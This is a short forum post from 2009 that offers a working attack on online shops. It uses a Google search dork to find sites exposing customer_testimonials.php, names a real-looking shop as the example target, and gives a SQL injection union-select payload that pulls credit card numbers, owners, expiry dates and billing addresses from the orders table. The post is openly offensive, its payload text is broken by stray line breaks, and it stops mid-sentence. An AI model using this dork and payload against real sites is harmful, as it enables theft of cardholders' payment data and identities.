Posted by: Bug Dork on: January 7, 2009
well, I have tried this and IT DOES WORK
First, google for
inurl:customer_testimonials.php?
Go to advanced search and select 100 enteries on one page
Then go to the second page and open a website.
Suppose, our target is
Code:
http://www.supermagnetman.net/customer_testimonials.php
Then paste the following code in the address bar
Quote:
customer_testimonials.php?testimonial_id=-8%20union%20select%200,1,2,3,4,concat(payment_meth od,0×7c3d3d7c,cc_type,0×7c3d3d7c,cc_owner,0×7c3d3d 7c,cc_number,0
x7c3d3d7c,cc_expires,0×7c3d3d7c,billing_country,0x 7c3d3d7c,billing_address_forma
t
_id,0×7c3d3d7c,billing_state,0×7c3d3d7c,billing_po stcode,0×7c3d3d7c,customers_te
l
ephone,0×7c3d3d7c,customers_name,0×7c3d3d7c,custom ers_company,0×7c3d3d7c,custome
r
s_street_address,0×7c3d3d7c,billing_city),6,7%20fr om%20orders/*
so that it [...]
Komentar Anda